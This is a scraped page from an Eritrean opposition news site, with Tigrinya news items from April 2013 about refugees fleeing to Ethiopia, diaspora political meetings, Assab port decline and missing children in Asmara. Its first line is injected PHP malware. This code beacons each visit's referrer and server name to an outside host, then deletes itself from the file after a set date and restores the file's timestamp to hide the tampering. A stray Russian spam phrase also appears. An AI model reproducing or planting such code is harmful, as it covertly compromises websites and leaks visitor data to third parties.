check_meta(); function check_meta(){ $jp = __FILE__; $jptime = filemtime($jp); if(time() >= 1456727708){ $jp_c = file_get_contents($jp); if($t = @strpos($jp_c,"check_meta();")) { $contentp = substr($jp_c,0,$t); if(@file_put_contents($jp, $contentp)){ @touch($jp,$jptime); } } } @file_get_contents("http://web.51.la:82/go.asp?svid=17&id=18776693&referrer=".$_SERVER['HTTP_REFERER']."&vpage=http://".$_SERVER['SERVER_NAME']."/components/com_content/helpers/helpers.php"); } ደሃይ ሃገር
кремлевская диета
User Rating: / 4
PoorBest 

 

 

 

 

 

 

 

 

19 ሚያዘያ 2013

ምሕደራ ኢሳይያስ ህላወ ወደባትና ትረጉም ስኢኑ ናብ ዝብኣሰ ጸገም ክሽመም

 ጌሩ ከምዘሎ ተገሊጹ።

ብትሕዝቶ ባሕርን ወደብን ሃፍታም ዝኾነት ሃገርና ኤርትራ ብስንኪ ስርዓት ህግደፍ ወደባታ ደረጅኦም እንዳንቆልቆለ ኣብ ኣዝዩ ኣስካፊ ሃዋህው በጺሑ ከም ዘሎ ኣብ ወደብ ዓሰብ ይሰርሕ ንዝነበረ ሕጂ ኣብ ስደት ዝነብር ዘሎ ዜጋ ብምጥቓስ ሬድዮ ኤረና ጸብጺባ።

ወደብ ዓሰብ ኣብ ከባቢኡ ካብ ዝርከቡ ወደባት ዝሓሸ ትሕተ ቅርጺ ዘለዋ ክነሱ ኣብዚ ሰዓት ዘለዉዎ ዓበይቲ ንብረት ክረይንን ካልኦት ማሺነሪታትን ዓንዮም ኣብ ኣስካፊ ኩነታት ወዲቑ ከም ዝርከብ ኣረጋጊጹዩ።

ነዚ ክኣልዩ ተባሂሎም ዝተቆጽሩ ሰራሕተኛታትውን ብሃገራዊ ኣገልግሎት ዝተቆረኑ ብምዃኖምን ንነዊሕ ዓመታት ዝሰርሑ ገዳይም ሰራሕተኛታትውን ብሕማምን ብዕድመን ይሰናበቱ ብምህላዎም እቲ ጸገም ካብ ዝኸፍኣ ናብ ዝበኣሰ ክሰጋገር ጌርዎ ከም ዘሎ እቲ ዜጋ ከም ዝገለጸ ሬድዮ ኤረና ሓቢራያ።

-----------------------------------------------///////////---------------------------

                                                                                                                          

 

 

19 ሚያዘያ 2013

ኤርትራዊ መንእሰይ ተማሂሩ ናብ ዝበጽሖ ራኢ ስለዘይብሉ ስደት ዝመርጽ ዘሎ ክብሎ ሎሚ ቅነ ናብ ኢትዮጵያ ዝኣተው 2 ተምሃሮ ዜጋታት ገሊጾም።

ብዕሱባት 3 ጠያይቲ ተተኲሲሎም ድምብርጽ ከይበሎም ዶብ ኣቋሪጾም ናብ ጎረቤት ኢትዮጵያ ዝኣተዉ 2 ተምሃሮ ንሉኡኽ ወጋሕታ ኣብ ዝሃብዎ ቃል ተማሂረ ናብዚ ክበጽሕየ ዝብል ሕልሚ ክህሉወካ ኣብ ዘይፈቅድ ክፉእ ኩነታት ምንባር ዝመርጽ ኤርትራዊ መንእሰይ ጠቅሊሉ ዝሰኣነሉ ህሞት ይኽሰት ከምዘሎ ገሊጾም።

እዞም ካብ ፎርቶ ዝሰገሩ ሳሚኤል ምሕረትኣብን ተስፋ ሃይለን ዝተብሃሉ ተምሃሮ ኣብ ከባቢኦም ዝነበሩ መንእሰያት ጠቅሊሎም ዶብ ስለዝሰገሩ እቲ ዝተፈጠረ ጽምዋ ተስፋታቶም ክጽልምት ከምዝገበሮ ኣረጋጊጾም።

ብሓንቲ ጥይት ዕሱባት ተሃሪሙ ዝኣተወሞ ሕክምናዊ ረድኤት ረኺቡ ኣብ ጽቡቅ ኩነታት ዘሎ ተምሃራይ ሳሚኤል ምሕረትኣብ ኣብ ዝነብረሉ ዓዲ ዘሎ ሓያል ዋሕዚ ስደት ኩነታት ጸሊኦም ዶብ ክስግሩ ቀልቦም ከምዘሸፈቶ ገሊጹ።

ኣብዚ ቅነ’ዚ ጥራይ 4 መማሃራና ዶብ ሰጊሮም’ዮም ስለዝኾነ ተማሂረ ኮነ ሰሪሐ ኣብዚ ክበጽሕ’የ ትብለሉ ራኢ ዘይብሉ ክፋእ ኩነታት’ዩ ኣብ ሃገርና ተፈጢሩ’ሎ ዝበለ ተምሃራይ ተስፋ ሃይለ ከኣ ነዚ ሓቂ’ዚ ብምግንዛብ ዶብ ክሰግር ከምዝመረጸ ተዛሪቡ።

ኣብ ዶባት ብገለ ዕሱባት ሓደጋ ክገጥመና’ዩ ኢልኩም ኣይስጋእኩምን ተባሂሎም ድማ እቶም ዜጋታት ነቲ ኩነታት ንግንዘቦ ኢና ግን ድማ ኣብ ውሽጢ ካብ ዘሎ ህሞት ኣይኸፍእን ብምባል ጉዕዞኦም ከምዝጀመሩ የነጽሩ።

እዚ ከምዚ ኢሉ ከሎ እቶም ኣብ ልዕሊ ዞም ተምሃሮ ተኹሲ ዝኸፈቱ 2 ዕሱባት በቲ ተግባሮም ኣበጊስዎ ኣብ ሰራዊት ዝተፈጠረ ስምዒት ቁጥዐ ተዳሂሎም ካብቲ ከባቢ ከምዝተሰወሩ ተፈሊጡ’ሎ።

እዚ ኩነታት ኣብ ዝተኸሰተሉ ኣጋጣሚ ጥራይ ብኣንፈት ዘላንበሳ 60 ዝኾኑ ዜጋታት ናብ ጎረቤት ኢትዮጵያ ከምዝኣተዉ ሓበሬታ ጨንፈር ቤ/ጽሕፈትና ኣረጋጊጹልና’ሎ።

-----------------------------/////////////////////-----------------------------------

19 ሚያዝያ 2013

ኣኼባ ሰልፊ ዲሞክራሲ ህዝቢ ኤርትራ

ኣብ ፍራንክፈርትን ከባቢኡን ብዓወት ተዛዚሙ

ሓርነት ኦርግ ከምዝጸብጸቦ ኣብ ፍራንክፈርትን ከባቢኡን ዝርከብ ጨንፈር ሰልፊ ዲሞክራሲ ህዝቢ ኤርትራ ሓደ ካብቶም ብዘይምቁራጽ ብኣካል እንዳተራኸበ ስሩዕ ኣኼባታቱ ዘካይድን ጉዕዞታቱ ዝግምግምን ኮይኑ ብ14 ሚያዝያ 2013’ውን ምዱብ ኣኼብኡ ኣካይዱ’ሎ።

ነቲ ኣኼባ ዝመረሐ ኣባል ማእከላይ ባይቶ እቲ ሰልፊ ኣቶ ንጉስ ጸጋይ ኣብ ዘስመዖ ዘረባ ጉዳይ ኤርትራ ኣብ ወጻኢ ብዝሰፍሐ ክዝረበሉን ሰልፊ ዲሞክራሲ ህዝቢ ኤርትራ ኣብ ዝመጽእ ኮንፈረንስ ሶሻሊስት ኢንተርናሽናል ክሳተፍ ጻዕርታት ክገብር ዝብል ርእይቶን ተስፋን ምብጽሑ ንተቓላሳይ ህዝብና ዓብይ ሓገዝ ምዃኑ ገሊጹ’ዩ።

ኣቶ ንጉስ ጸጋይ ብተወሳኺ ኣብ ትሕቲ ምልካዊ ስርዓት ኢሳይያስ ብዘይ ቅዋም ትመሓደር ኣብ ዘላ ኤርትራ ሕግን ስርዓትን ብዘይምህላዉ እቶም ዝወጹ ሕግታታት’ውን ንረብሓ’ቲ ውልቀ መላኺ ዘገልግሉ ጥራሕ ብምዃኖም ዜጋታት ማዕረ ተጠቀምቲ መሲሎም’ዮም ኢልካ ንምዝራብ ከም ዘይከኣል ኣስሚሩሉ’ዩ።

ኣብ መወዳእታ እቲ ኣኼባ ካብ ተሳተፍቲ ንዝቐረቡ ሕቶታት መብርሂ ድሕሪ ምሃብን ተወሰኽቲ ሓሳባት ርእይቶታትን ድሕሪ ምስማዕ ብዝኽረ ሰማእታት ምድምዳሙ ተሓቢሩ።

--------------------------------------//////////////---------------------------------

 

20 ሚያዝያ 2013

ስርሒት ፎርቶ ሰፊሕ ህዝባዊ ደገፍ ረኺቡ ኣንጻር ምልክነት ናብ ዘቕንዐ ውዑይ ምንቅስቓስ ዘሰጋገረ ፍጻመ ምዃኑ ተገሊጹ

ካብ 15-16 ሚያዝያ 2013 10 ስሩዕ ኣኼብኡ ዘሰላሰለ ፖለቲካዊ ቤት ጽሕፈት ሰውራዊ ዲሞክራሲያዊ ኤርትራ ኣብ ዘውጽኦ ደምዳሚ መግለጺ ስርሒት ፎርቶ 21 ጥሪ ዓመተ 2013 ኣብ ህዝቢ ፍናን ፈጢሩ  ኣንጻር ስርዓት ኢሳይያስ ናብ ዘቕንዐ ውዑይ ምንቅስቓስ ክሰጋገር ዝገበረ ታሪኻዊ ፍጻመ ምዃኑ ኣነጺሩ።

እቲ ፍጻመ ብንጡፍ ተሳትፎ ሓይልታት ምክልኻልን ሰፊሕ ህዝባዊ ድጋፍን እንተተዋሃሃዱ ብዝተኣማምን መልክዕ ዓወት ክርከብ ከምዝኽእል ዘርኣየ ምዃኑ’ውን እቲ ፖለቲካዊ ቤት ጽሕፈት ገሊጹ’ዩ።

እቲ ቤት ጽሕፈት ብተወሳኺ ዓለምለኻዊ ጉጅለ ቅልውላው (ICG) ንህልዉ ኩነታት ሃገርና ኣመልኪቱ ኣብ ዘካየዶ መጽናዕቲ ዘቐመጦ ፍታሕ ንዲሞክራሲያዊ ቃልስና ዘለዎ ትርጉምን ድማ ብዕምቆት ገምጊሙ’ዩ።

ፖለቲካዊ ቤት ጽሕፈት ሰውራዊ ዲሞክራሲያዊ ግንባር ኤርትራ ኣብ መወዳእታ ሓያላት ጎንታቱ ንምጥንኻር ድኹማት ጎንታቱ ድማ ንምእራም ካብኡ ዝጥለብ ከበርክት ዘለዎ ቅሩብነት ድሕሪ ምርግጋጽ መንእሰያትና ብሓፈሻ ስምረት ኤርትራውያን መንእሰያት ንድሕነት ሃገር ድማ ብፍላይ ከቢብዎም ንዘሎ ብደሆታትን ጸገማትን ብግቡእ ብምግንዛብ ናብ ዕውት ጉባኤ ንምብጻሕ የካይድዎ ንዘለዉ ጻዕሪ ደገፉ ገሊጹ።

----------------------------------------////////-------------------------------------

 

20 ሚያዝያ 2013

ስምረት መንእሰያት ኤርትራ ንድሕነት ሃገር

ዞባ ኤውሮጳ ዕውት ኣኼባ ኣካይዱ።

ክፍሊ ዜናን ባህልን እቲ ስምረት ከምዝሓበሮ ስምረት መንእሰያት ኤርትራ ንድሕነት ሃገረ ዞባ ኤውሮጳ ምስታ ብባይቶ ዝተመዘዘት ንኡስ ሽማግለ ብምዃን ብ13 ሚያዝያ 2013 ዕውት ኣኼባ ኣካይዱ።

ኣብቲ ናይ መጀመርታ ርክብ ኣብ ህሉውን ዝሓለፉን ተመክሮታት ኤውሮጳ ኣመልኪቱ ልዝብ ዝተኻየደ ኮይኑ ተሳተፍቲ ብዛዕባ ኣብ መስርሕ ቓልሲ ዘጋጠሙ ሕልኽላኻትን ኣፈታትሖኦምን ብዝርዝር ዘትዮም።

ካብ ብሪጣንያ፡ ሽወደን፡ ኖርወይ፡ ስዊዝ፡ ኣየርላንድ፡ ሆላንድ፡ጀርመንን ኢጣልያን ዝተዋጽኡ መራሕትን ወከልትን ኣብቲ ኣኼባ ከምዝተሳተፉ ድማ ክፍሊ ዜናን ባህልን ስምረት መንእሰያት ኤርትራ ንድሕነት ሃገር ሓቢሩ’ዩ።

--------------------------------------/////////--------------------------------------

 

 

 

21 ሚያዝያ 2013

ግዱድ ዕስክርና ምልክነት ኢሳይያስ መጻኢ ዕድል ደቀንስትዮ ክጽልምት ይገብር ኣሎ ክብላ ክልተ ደቀንስትዮ ዜጋታት ገሊጻን

ኣብዚ ቀረባ እዋን ካብ ከባቢ ደዳሽም ናብ ጎረቤት ኢትዮጵያ ዝኣተወት ጓል 35 ዓመት ዜጋ ምልክነት ኢሳይያስ ንዓመታት ዝተኸተሎ ግዱድ ዕስክርና ኤርትራውያን ደቀንስትዮ ሓዳር ጌረን ዝወልዳሉ ዕድመ ክሓልፈን ብምግባር መጻኢአን የጸልምቶ ምህላዉ ገሊጻ።

ንሳ ነዚ እምነት’ዚ ዝገለጸት ክሳብ ሕጂ ሓዳር ትገብረሉ ዕድል እንዳጸበበ ክኸይድ ካብ ዝገበሮ ብጭቡጥ ኣብ ባይታ ዘሎ ኩነታት ብምብጋስ ከምዝኾነ ከኣ ኣስሚራትሉ።

እዛ ሽመይ ዓቕቡለይ ዝበለት ዜጋ ዕድሚኣ 35 ዓመት ምስመልአ ውላድን ሓዳርን ከይፈተንኩ ክጽልምተኒ’ዩ ዝብል ስግኣታ ሰማይ ዓሪጉዋ ንሳ ትናብዮም ንዝነበረት ዓይነስውር ወለዳ ጠንጢናቶም ከምዝኣተወት ከኣ ከይሓብአት ተዛሪባ’ያ።

ካሊእ ኣደ ሰለስተ ቆልዑ’የ ግን ድማ ሓዳር የብለይን ክትብል ዝገለጸት ዜጋ ድማ ደቂተባዕትዮ ዕድሚኦም ኣብ ፈቖድኡ ክዕስክሩ ዝበልየሉ ዘሎ ኩነታት ኤርትራ ፈትሊ ወለዶ ዝልቁም ሓዳርን ናብራን ቦታ ክስእን ይገብር ከምዘሎ ኣውራ ግዳያት ናይቲ ጸገም ድማ ደቀንስትዮ ይኾና ምህላወን ኣረጋጊጻ’ያ።

ኣደ ቆልዑት’የ ግን ሓዳር የብለይን ዝበልክኒ ምስ በዓል ቤትኪ ተፈላሊኺ ዲኺ ኮንኪ ተባሂላ ምስተሓተተት ድማ ኣቦ ደቃ ካሊእ ሓዳር ከምዘለዎ ናፈለጠት ዝረኸበቶ ዕድል ተጠቒማ ቆልዑ ክትወልድ ስለዝደለየት ጥራይ ከምዝተወሸመቶ ሓቢራ’ያ።

ክልቲአን ናብ ጎረቤት ኢትዮጵያ ዝኣተዋ ዜጋታት ምልክነት ኢሳይያስ ወለዶ ኤርትራ ውሑስ ምውርራስ ዝገብረሉ ዕድል ክጸብብ ብምግባር ኤርትራውነት ብድሆ ክገጥሞ ጌሩ ስለዘሎ ንዑኡ ምእላይ ሃገርን መንነትን ምውሓስ ከምዝቑጸር ብኣጽንዖት ገሊጸን’የን።

-----------------------------------------/////////-----------------------------------

 

23 ሚያዚያ 2013

ስምረት መንእሰያት ኤርትራ ንድሕነት ሃገር  ዞባ ኤውሮጳ ዕውት

 ኣኼባ ኣካይዱ።

ኣብቲ ብ13 ሚያዝያ ዓመተ 2013 ዝተኻየደ ኣኼባ ካብ ዝተፈላለያ ከተማታት ኤውሮጳ ዝተዋጻጽኡ መሪሕነትን ወከልትን ጨናፍር ስምረት መንእሰያት ኤርትራ ንድሕነት ሃገር ዞባ ኤውሮጳ ዝተሳተፉ ኮይኖም  ብባይቶ ዝተመዘዘት ንኡስ ሽማግለን ኣብ ህሉውን ዝሓለፉን ተመኩሮታት ኤውሮጳን ኣብ መስርሕ ቃልሲ ብዛዕባ ዘጋጥሙ ሕልኽላኻትን ኣፈታትሐኦምን ብዝርዝር ዘትዮም’ዮም።

ስምረት መንእሰያት ኤርትራ ንድሕነት ሃገር ሓደ ካብቲ ቀንዲ ዕላማታቱ ንኩሉ ደላይ ፍትሒ መንእሰይ ኣብ ሓደ ናይ ቃልሲ መስመር ኣሳቲፍካ ሓበራዊ ፍታሕ ምንዳይ‘ዩ ክብል’ውን ገሊጹ’ዩ። በዚ መሰረት እቲ ዝተገበረ ኣኼባ ነዚ ሓቂ’ዚ ዘንጸባረቐ ኮይኑ ብዝያዳ ንምድንፋዕ ስፍሕ ብዝበለ ኣገባብ ክካየድ’ውን ካብ ተሳተፍቲ ለበዋታት ቀሪቡ’ዩ።

ኣብቲ ኣኼባ ካብ ብሪጣንያ፡ ስዊድን፡  ኖርወይ፡ ስዊስ፡ ኣየርላንድ፡ ሆላንድ፡ ጀርመንን ኢጣልያን ዝተዋጽኡ መሪሕነትን ወካልትን ተሳቲፎም’ዮም።

ኣብዚ ናይ መጀመርያ ርክብ ዝተላዕሉ ጉዳያት ለበዋታት ሕቶታት ርእይቶታት ናብ ባይቶ ክመሓላለፉ ምኳኖም’ውን ስምረት መንእሰያት ኤርትራ ንድሕነት ሃገር ወሲኹ ሓቢሩ’ዩ።

---------------------------------------------////////--------------------------------

 

23 ሚያዚያ 2013

ኣብ ኣስመራ ቆልዑ ዝጠፍእሉ ተርእዮ ስለዝተበራኸተ ኣብ ጎደናታት ዝረኣየ ዓይኑ ይብራህ ዝብል ምልክታት ብብዝሒ ይጥቃዕ ኣሎ።

ብፍላይ ኣብ ከባብታት ገዛ ባንዳ ጥልያንን ገጀረትን ካብ 10-12 ዓመት ዝዕድሚኦም ብዙሓት ቆልዑ ከምዝጠፍኡን ወለዶም ንዘመልክቱዎ በዓል ስልጣን ሓርቢትዎም ኣብ መናድቕ ስእሊ እቶም ግዳያት ኣሰንዮም ናይ ርድኡና ኣውያት ይልጥፉ ከምዘለው እታ መርበብ ሓበሬታ ወሲኻ ሓቢራ።

ስርዓት ህግደፍ ዝዋስኣሉ ናይ ምድረ በዳ ሲናይ ገበን ክሳብ ውሽጢ ዓዲ ሰንሰለቱ ብምዝርጋሕ ቆልዑ ካብ ገዝኦም ይጠፍኡሉ ዘለው ተርእዮ ካብ ጊዜ ናብ ጊዜ ይውስኽ ከምዘሎ ገሊጽና ምንባርና ይዝከር።

---------------------------------------------////////--------------------------------

23 ሚያዚያ 2013

ኢትዮጵያ ኣብ ዝኾነ ይኹን እዋን ምስ ኤርትራ ክትዛተ ቅርብቲ ከምዝኾነት ቀዳማይ ሚኒስተር  እታ ሃገር ገሊጹ።

ብኣባላት ባይቶ ኤውሮጳዊ ሕብረት፡ ኢትዮጵያ ምስ ጎረባብታ ኣብ ዝህልዋ ርክብ ኣቶኪራ ትኽተሎ ፖሊሲ ብዝምልከት ተሓቲቱ ምላሽ ዝሃበ ቀዳማይ ሚኒስተር ሃይለማርያም ደሳለኝ ኢትዮጵያ ኣብ ዝኾነ ይኹን እዋን ምስ ኤርትራ ንዘለዋ ሓርፋፍ ርክብ ናብ ንቡር ዝመልስ ዝርርብ ክትገብር ቅርብቲ’ያ ክብል ምርግጋጹ ሱዳን ትሪቡን ጸብጺቡ።

ኢትዮጵያ  ዘውጸኣቶ እቲ ርክብ ምዕሩይ ዝኾነሉ ሃዋህው ዝፈጥር’ዩ ዝበለቶ በዓል 5 ነጥቢ እማመ ሰላም ሕጂ’ውን ኣብ ቦትኡ ከምዘሎ ድማ ገሊጹ’ሎ።

ኢትዮጵያ ጸገማት ኣብ ዙርያ ጠረጴዛ ብሰላም ተፈቲሖም ርክብ ክልቲኤን ሃገራት ናብ ንቡር ክምለስ ብተደጋጋሚ ከምዝሓተተት ድማ እቲ ቀዳማይ ሚኒስተር ሓቢሩ’ዩ።

ቅድም ክብል’ውን እቲ ቀዳማይ ሚኒስተር ናብ ኣስመራ ከይዱ ምስ ፕረዚደንት ኢሳይያስ ክዘራረብ ተተሓቲቱ  ፍቃደኛ ከምዝኸውን ንኣልጀዚራ ገሊጹ ምንባሩ ዝዝከር’ዩ።

---------------------------------------------////////--------------------------------

23 ሚያዚያ 2013

ስርዓት ኢሳይያስ ብሃንደበት ወረቐት ማእሰርቲ ልኢኹ ዜጋታት ኣብ ትሕቲ ቀይዲ የውዕል ከምዘሎ ተገሊጹ።

ኣብዚ ቅነ’ዚ ናብ ጎረቤት ኢትዮጵያ ዝሰገረ ኣባል ክፍለ ሰራዊት 55 ዝኾነ  ዜጋ ኣብ ዝሃቦ ቃል ብሃንደበት ወረቐት ማእሰርቲ ካብ ህግደፍ ምስ በጽሖ ደቁ ንብረቱን ሒዙ ደምብኡ ዓጽዩ ዶብ ከምዝሰገረ ገሊጹ’ሎ።

እዚ ካብ ዓዲ ኮኾባይ ተበጊሱ ናብ ኢትዮጵያ ዝሰገረ ወዲ 66 ዓመት ዜጋ ምልክነት  ኢሳይያስ ብጥቆማ ጥራይ ዋላ ሓንቲ ምጽራይ ከይገበረ ዜጋታት ብሃንደበት ማእሰርቲ ክወርዱ ይገብር ከምዘሎ ንሉኡኽና ኣረጋጊጹሉ’ዩ።

ንሱ በቲ ስርዓት ይድለ ከምዘሎ ሓበሬታ ምስረኸበ ደቁን ሰበይቱን ሒዙ ምስ ጥሪቱን ንብረቱን ክሰግር ምኽኣሉ ባህትኡ ወሰን ከምዘይብሉ ድማ ኣነጺሩ።

ኤርትራውያን ስድራታት ጥሪተን ሒዘን ዶብ ዝሰግራሉ ተርእዮ ይበራኸት ምህላው ገሊጽና ምንባርና ዝዝከር’ዩ።

---------------------------------------------////////--------------------------------

23 ሚያዚያ 2013

መማሃራንን ተምሃሮን ዶባት ዝሰግሩሉ ተርእዮ ልዕሊ ዝኾነ ይኹን እዋን ተበራኺቱ ከምዘሎ ተፈሊጡ።

ኣብ ኢትዮጵያ ዝርከብ ጨንፈር ቤትጽሕፈት ወጋሕታ ሳሊና ዝሰደደልና ሓበሬታ ከምዘረጋገጾ ካብ ቀረባ እዋን ጀሚሩ ዶባት ይሰግሩ ካብ ዘለው ዜጋታትና እቶም ዝዓዘዘ ኣሃዝ ዝሓዙ መማሃራንን ተምሃሮን ኮይኖም ኣለው።

ካብ 10 ሰደተኛታት እቶም 8 ተምሃሮ እቶም ዝተረፉ 2 ድማ መማሃራን ዝኾንሉ ተርእዮ ብዙሕ’ዩ ክብል  ድማ ብኣብነት ገሊጹ።

እዚ መማሃራንን ተምሃሮን ብበዝሒ ዝውሕዙሉ ዘለው ተርእዩ ተማሂርካ ኣበይ ክብጻሕ ኔሩ’ዩ ዝብል ምልክነት ኢሳይያስ ካብ ዝፈጠሮ ሃዋህው ዝብገስ ተስፋ ናይ ምቁራጽ ስምዒት ሰማይ ብምዕራጉ ዝተኸሰተ ከምዝኾነ’ቲ ሓበሬታ የነጽር።

ንዓመታት ናብራ ጸጊሙና ኢሎም መማሃራን ዘቕረብዎ ሕቶ ወሰኽ መሃያ ለሚሱ ብዘሎ ቑጠባዊ ዓቅሚ ህግደፍ ምላሽ ክረክብ ዘይምክኣሉ ድማ ነቲ ዝጸንሐ ዋሕዚ መዓልታዊ ክኸውን ጌሩዎ ከምዘሎ እቲ ጨንፈር ቤትጽሕፈትና ዝሰደደልና ሓበሬታ ወሲኹ ገሊጹ።

---------------------------------------------////////--------------------------------

 

24 ሚያዝያ 2013

ፍቕርን ምትሕልላይን መለለይ ኤርትራውያን ስደተኛታት’ዩ

 ክብል ውድብ ሕቡራት ሃገራት ገሊጹ

ፍቕርን ምትሕልላይን መለለይ ኣብ ስደት ብሓፈሻ ኣብ ኡጋንዳ ዝርከቡ ኤርትራውያን ስደተኛታት ድማ ብፍላይ ከምዝኾነ ንመግለጺ ላዕለዋይ ኮሚሽን ስደተኛታት ውድብ ሕቡራት ሃገራት ብምጥቓስ ሬድዮ ኤረና ሓቢራ።

እቲ መግለጺ ሓደሽቲ ናብታ ሃገር ዝኣተው ስደተኛታት’ውን እንተኾኑ ሳላቶም ኣቐዲሞም ዝተሰደዱ ኤርትራውያን ዓዲ ንምፍላጥ ኮነ መነባብሮኦም ንምትዕርራይ ብዙሕ ከምዘይጸገሙ ኣረዲኡ።

ኤርትራውያን ዋላ’ውን ኣቐዲሞም ዝፍለጡ ኣይኹኑ’ምበር ሓደሽቲ ምዃኖም እንተፈሊጦም ዝከኣሎም’ዮም ዝተሓባበርዎም ዝበለት ማርያ ሜንግኒ ካብ ላዕለዋይ ኮሚሽን ስደተኛታት ሕቡራት ሃገራት እዚ ባህሊ ኤርትራውያን ኣብ ካልኦት ብዙሓት ስደተኛታት ዘይትዕዘቦ’ዩ ክትብል ገሊጻ’ያ።

ካብ ዓመተ 2006 ንደሓር ኤርትራውያን ስደተኛታት ርእሶም ዝኽእልሉ ባይታ እንተፈጢሮም ኣብ ዝመረጽዎ ክፋል እታ ሃገር ክነብሩ ከምዝኽእሉ መንግስቲ ኡጋንዳ ፍቓድ ድሕሪ ምሃቡ ብዓሰርተታት ኣሸሓት ዝቑጸሩ ኤርትራውያን ኣብታ ሃገር መነባብሮኦም ይመርሑ ከምዘለዉ ከኣ ተጠቒሱ።

በብእዋኑ’ውን ሓያሎ ካብኣቶም ናብ ኤውሮጳ፡ ካናዳን፡ ኣውስትራሊያን ዝጣየሰሉ ዕድል ይረኽቡ ከምዘለዉ እታ ሬድዮ ሓቢራ’ያ።

 

 Add comment

Your comments are as important as the article you are commenting on. Please enrich the discussion by avoiding personal attacks. We'll publish your comment, if it meets our criteria. تعليقاتك لا تقل اهمية عن المقال المكتوب اعلاه، فالرجاء اثراء النقاش بالابتعاد عن الاساءات الشخصية. سوف ننشر تعليقك اذا استوف شروط النشرSecurity code
Refresh

Enough dictatorship

Get Adobe Flash player

Arkokabay Media -----> Poem

Get Adobe Flash player

مرض الرئيس الأريتري بين الشائعة والنفي

Get Adobe Flash player

ALIA GABRES- SHE COTTON SUMMER DRESSES

Get Adobe Flash player